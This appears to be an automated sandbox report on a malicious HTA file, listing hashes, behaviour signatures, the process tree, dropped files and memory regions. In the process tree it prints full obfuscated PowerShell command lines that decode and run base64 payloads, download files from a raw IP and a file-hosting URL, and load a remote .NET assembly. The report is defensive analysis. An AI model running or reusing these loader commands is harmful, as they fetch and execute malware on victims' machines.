Analysis

  • max time kernel
    148s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-11-2024 02:04

General

  • Target

    0a1406408e5a87cd2610c8c3c7edce3c2390ab15c901f8d1168ebdee211910e7.hta

  • Size

    207KB

  • MD5

    1cc49542b6408627091678140cb916c9

  • SHA1

    66e198338df798a6ef051a71feee749bae890a6d

  • SHA256

    0a1406408e5a87cd2610c8c3c7edce3c2390ab15c901f8d1168ebdee211910e7

  • SHA512

    1a0a432d112a5f2091c25a629c4a345bd0977207d4451b1581d0b1bdab2375b38207d0e760a56d595fcc975b9d708b897347a7d5a408f1a13c53965d23e9314b

  • SSDEEP

    96:43F97yT4lwyT4lYv7eZ9emfyFX4T4lTfQ:43F1yT4myT4Kv7eOkyd4T4dQ

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Evasion via Device Credential Deployment 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\0a1406408e5a87cd2610c8c3c7edce3c2390ab15c901f8d1168ebdee211910e7.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2484
    • C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE
      "C:\Windows\SysTeM32\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE" "powersheLL.Exe -eX byPaSS -nOP -W 1 -c DEVicecreDENTIAldEpLOyMent.EXe ; IEx($(IEX('[SySTem.tEXT.eNcodINg]'+[cHAR]58+[cHar]58+'UTf8.gEtSTrinG([SYSTEm.CONvErt]'+[ChAR]0X3A+[cHar]58+'FrOmbaSe64sTrINg('+[chaR]0X22+'JGQzV3JwICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJFckRlRmluaXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJrdExTUVhZLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEVYb1FHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJIbGxGLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsb3hDeHF1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdXUik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkJaZ1NrT0N3ZnQiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpXYW1SYUx2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRkM1dycDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTY3L3hhbXBwL25jL3NlZXRoZWJlc3RvcHRpb25zdG91bmRlcnN0YW5kZmFzdHRoaW5nc3RvYmVnZXRiYWNrYmlzY3V0LnRJRiIsIiRlTnY6QVBQREFUQVxzZWV0aGViZXN0b3B0aW9uc3RvdW5kZXJzdGFuZGZhc3R0aGluZ3N0b2JlZ2V0LnZiUyIsMCwwKTtTdEFSdC1TbEVlUCgzKTtzdGFyVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcc2VldGhlYmVzdG9wdGlvbnN0b3VuZGVyc3RhbmRmYXN0dGhpbmdzdG9iZWdldC52YlMi'+[ChAr]34+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2140
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPaSS -nOP -W 1 -c DEVicecreDENTIAldEpLOyMent.EXe
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2312
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5v1l4tli\5v1l4tli.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1888
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8685.tmp" "c:\Users\Admin\AppData\Local\Temp\5v1l4tli\CSC5037BC2A632742CDA51A1F19327138D.TMP"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3180
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestoptionstounderstandfastthingstobeget.vbS"
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:396
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHZlcmJPc0VwcmVmZVJlbmNlLnRvc3RySW5nKClbMSwzXSsnWCctam9JTicnKSgoJ2ZRSGltYWdlVXJsID0gb0xsaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT0yQWFfYldvOVJldTQ1dDcnKydCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblQnKydJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDk0NTE3NmEwOTA0ZiBvTGw7JysnZlFId2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0RQPVKFCZHEXDABsonhadorldlYkNsaWUnKyduJysndDtmUUhpbWFnZUJ5JysndGVzID0gZlFId2ViQ2xpZW50LkRvd24nKydsb2FkRGF0YShmUUhpbWEnKydnZVVybCk7ZlFIaW1hJysnZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoZlFIaW1hZ2VCeXRlcyk7ZlFIc3RhcnRGbGFnID0gb0xsPDxCQVNFNjRfU1RBUlQ+Pm9MbDtmUUhlbmRGbGFnID0gb0xsPDxCJysnQVMnKydFNjRfRU5EJysnPj5vTGw7ZlFIc3RhcnRJbmRleCA9JysnIGZRSGknKydtYWdlVGV4dC5JbmRleE9mKGZRSHN0YXJ0RmxhZyk7ZlFIZW5kSW5kJysnZXggPSAnKydmUUhpbWFnZVRleHQuSW5kZXhPZihmUUhlbmRGbGFnKTtmUUhzdGFydEluZGV4IC1nZSAwIC1hbmQgZlEnKydIZW5kSW5kZXggLWd0IGZRSHN0YXJ0SW5kZXg7ZlFIc3RhcnRJbmRleCArPSBmUUhzdGFydEZsYWcuTGVuZ3RoO2ZRSGInKydhc2U2NExlbmd0aCA9IGZRSGVuJysnZEluZGV4IC0gZlFIcycrJ3RhcnRJbmRleDtmJysnUUhiYXNlNjRDb21tYW5kID0gZlFIaW1hZ2VUZXh0LlN1YnN0cmluZyhmUUhzdGFydEluJysnZGV4LCBmUUhiYXNlNjRMZW5ndGgpO2ZRSGJhc2U2NFJldmVyc2VkID0gRQPVKFCZHEXDABsonhadorWpvaW4gKGZRSGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAxaVEgRm9yRWFjaC1PYmplY3QgeyBmUUhfIH0pWy0xLi4tKGZRSGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07ZlFIY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhmUScrJ0hiYXNlNjRSZXZlcnNlZCk7ZlFIbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKGZRSGNvbW1hbmQnKydCeXRlcyk7ZlFIdmEnKydpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChvTGxWQUlvTGwpO2ZRSHZhaU1ldGhvZC5JbnZva2UoZlFIbnVsbCwgQChvTGx0eHQuQVNGRVNSVy9jbi9wcG1heC83NjEuODcxLjY0Ljg5MS8vOnB0dGhvTGwsIG9MbGRlc2F0aXZhZG9vTGwsIG9MbGRlc2F0aXZhZG9vTGwsIG9MbGRlc2F0aXZhZG9vTGwsIG9MbGFzcG5ldF9jb21waWxlcm9MbCwgb0xsZGVzYXRpdmFkb29MbCwgb0xsZGVzYXRpdmFkb29MbCxvTGxkZXNhdGl2YWRvb0xsLG9MbGRlc2F0aXZhZG9vTGwsb0xsZGVzYXRpdmFkb29MbCxvTGwnKydkZXNhdGl2YWRvb0xsLG9MbGRlc2F0aXZhZG9vTGwsJysnb0xsMW9MbCxvTGxkZXNhdGl2YWRvb0xsKSk7JykuckVwTGFjRSgoW2NoYXJdMTExK1tjaGFyXTc2K1tjaGFyXTEwOCksW3NUUklOZ11bY2hhcl0zOSkuckVwTGFjRSgoW2NoYXJdNDkrW2NoYXJdMTA1K1tjaGFyXTgxKSxbc1RSSU5nXVtjaGFyXTEyNCkuckVwTGFjRSgnZlFIJywnJCcpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3136
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3260

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pOWeRSheLl.EXE.log

    Filesize

    2KB

    MD5

    3d086a433708053f9bf9523e1d87a4e8

    SHA1

    b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

    SHA256

    6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

    SHA512

    931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    7ade4eac19edec129ed9db85cb5532a7

    SHA1

    0391739389af7215368f628538e216b5dceda076

    SHA256

    82ece7dda590f669ba419ebb5b424e72fd7cada67158c5afe779007405425bf6

    SHA512

    ce25a5f48e2b58c6e806243252cccd6122498ba9194d502af273aec0035c4f772a41ce97849b3dcbce0fb213dfafdade12f4535ec8ce0de4c1b5beb68231d83c

  • C:\Users\Admin\AppData\Local\Temp\5v1l4tli\5v1l4tli.dll

    Filesize

    3KB

    MD5

    9fe79efa6323525225d363ace15df72f

    SHA1

    e5e5ef02040b9f7c27e4ffcbd098112a3e8c6473

    SHA256

    05f17359cc26de9edbd500ac70a7b6d4740771050b44b6335e2f8fc3ba41e9d5

    SHA512

    3cf16f9bb2d642882b960149361169d48f54f37b0b6231f9142e5fb373a3238bdc44b01db21cc112858e43e2e3a8f4383beab50e5765f2d4f2d139fe9bf783b4

  • C:\Users\Admin\AppData\Local\Temp\RES8685.tmp

    Filesize

    1KB

    MD5

    d8aa2f25f919a326f53874af42a320c6

    SHA1

    9b820a7d273dcc84f2e2acf0012d0dde5d3339b0

    SHA256

    e2dbd0364a0a5849588594d8e6882d2688ba158a0facc5e3b7d375a022856741

    SHA512

    d210ca2a0334023e9c99b77b619ee9862ffab94f5cc77b509a99cd4b008709ddae7c23565e8675baba6fdb901eff14a16d0669be307f410594b39564ce25e8ad

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4wpistrh.pi2.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\seethebestoptionstounderstandfastthingstobeget.vbS

    Filesize

    138KB

    MD5

    4f46597a54e903c400cac4db5a222ecb

    SHA1

    0a2f30da05a532bfbddaba3af235011d60db8fc8

    SHA256

    ba78e6d4f42b1aab53a731c9bd0820d2f0278170eb5ef92604f32e92cfcb8246

    SHA512

    ffac65a2a99fe7c3883bb82f5736dbcbcdd8e3d8cecd265fda76e7b7d07d266f1f0b11eaa3adcf714a7e50314d3e140e50799e5b52fe2494da05f504912f344a

  • \??\c:\Users\Admin\AppData\Local\Temp\5v1l4tli\5v1l4tli.0.cs

    Filesize

    483B

    MD5

    0b9734ed54c4f41d0c94957b007eb3d5

    SHA1

    ebabbb2d826295a994ba691d921a4c7c5ed506d1

    SHA256

    36632527d6cce240e5833d6251632127fd95f085c35a3aa2a363be2f2cbc84fa

    SHA512

    d32ebc74674dd75c354a9b74324421a2a4af0a2d6feeb3735d3fab857fb488aaf8be88f4687299c614b6e70556b3980ba007ba02abb8e5e341a2cabccdd10b17

  • \??\c:\Users\Admin\AppData\Local\Temp\5v1l4tli\5v1l4tli.cmdline

    Filesize

    369B

    MD5

    a7e015ee5f79210a63dba811dfb28e78

    SHA1

    b9d2ca819d228b8b57022245f8ae3b64ac9e6b21

    SHA256

    4f3850a9002617f568507a7f35d341c4af517db9cde1cb385a39a1aea4ebea41

    SHA512

    73c24f9ac50e0f1edd2487b89340c9e4f32e13d1f249b0e86fe2a778806e8ee649c40d09ec6c403cc97fea23f33949b22d1e4a10fbb6a099543df861814d410b

  • \??\c:\Users\Admin\AppData\Local\Temp\5v1l4tli\CSC5037BC2A632742CDA51A1F19327138D.TMP

    Filesize

    652B

    MD5

    1b25fdc46469068a40fa6184405e4346

    SHA1

    19e31ce6770008877096fbbe5b6e25fe68065947

    SHA256

    447dd2d370612b55bcf7ce2de965c1e5ea91527b14b14c01e256dbee4d18ea3f

    SHA512

    4f00b01776650c7d24cc0a1b5152b00b36c5832bc82abf74e4fb34b27a9d77a72b8adf3243dd6cf2030c3231571b266f7123d786785b1fd3f023819f66ea6edf

  • memory/2140-13-0x00000000061B0000-0x0000000006504000-memory.dmp

    Filesize

    3.3MB

  • memory/2140-73-0x0000000007B80000-0x0000000007BA2000-memory.dmp

    Filesize

    136KB

  • memory/2140-19-0x00000000067E0000-0x000000000682C000-memory.dmp

    Filesize

    304KB

  • memory/2140-81-0x0000000071340000-0x0000000071AF0000-memory.dmp

    Filesize

    7.7MB

  • memory/2140-1-0x0000000005200000-0x0000000005236000-memory.dmp

    Filesize

    216KB

  • memory/2140-2-0x0000000005900000-0x0000000005F28000-memory.dmp

    Filesize

    6.2MB

  • memory/2140-3-0x0000000071340000-0x0000000071AF0000-memory.dmp

    Filesize

    7.7MB

  • memory/2140-74-0x0000000008C90000-0x0000000009234000-memory.dmp

    Filesize

    5.6MB

  • memory/2140-18-0x00000000067C0000-0x00000000067DE000-memory.dmp

    Filesize

    120KB

  • memory/2140-7-0x0000000006140000-0x00000000061A6000-memory.dmp

    Filesize

    408KB

  • memory/2140-72-0x0000000071340000-0x0000000071AF0000-memory.dmp

    Filesize

    7.7MB

  • memory/2140-71-0x000000007134E000-0x000000007134F000-memory.dmp

    Filesize

    4KB

  • memory/2140-65-0x0000000006D60000-0x0000000006D68000-memory.dmp

    Filesize

    32KB

  • memory/2140-4-0x0000000071340000-0x0000000071AF0000-memory.dmp

    Filesize

    7.7MB

  • memory/2140-5-0x0000000005F30000-0x0000000005F52000-memory.dmp

    Filesize

    136KB

  • memory/2140-6-0x00000000060D0000-0x0000000006136000-memory.dmp

    Filesize

    408KB

  • memory/2140-0-0x000000007134E000-0x000000007134F000-memory.dmp

    Filesize

    4KB

  • memory/2312-43-0x0000000007330000-0x000000000734A000-memory.dmp

    Filesize

    104KB

  • memory/2312-50-0x0000000007650000-0x0000000007658000-memory.dmp

    Filesize

    32KB

  • memory/2312-49-0x0000000007670000-0x000000000768A000-memory.dmp

    Filesize

    104KB

  • memory/2312-48-0x0000000007570000-0x0000000007584000-memory.dmp

    Filesize

    80KB

  • memory/2312-47-0x0000000007560000-0x000000000756E000-memory.dmp

    Filesize

    56KB

  • memory/2312-46-0x0000000007530000-0x0000000007541000-memory.dmp

    Filesize

    68KB

  • memory/2312-45-0x00000000075B0000-0x0000000007646000-memory.dmp

    Filesize

    600KB

  • memory/2312-44-0x00000000073A0000-0x00000000073AA000-memory.dmp

    Filesize

    40KB

  • memory/2312-42-0x0000000007980000-0x0000000007FFA000-memory.dmp

    Filesize

    6.5MB

  • memory/2312-41-0x0000000007210000-0x00000000072B3000-memory.dmp

    Filesize

    652KB

  • memory/2312-40-0x00000000065C0000-0x00000000065DE000-memory.dmp

    Filesize

    120KB

  • memory/2312-30-0x000000006DC00000-0x000000006DC4C000-memory.dmp

    Filesize

    304KB

  • memory/2312-29-0x00000000071D0000-0x0000000007202000-memory.dmp

    Filesize

    200KB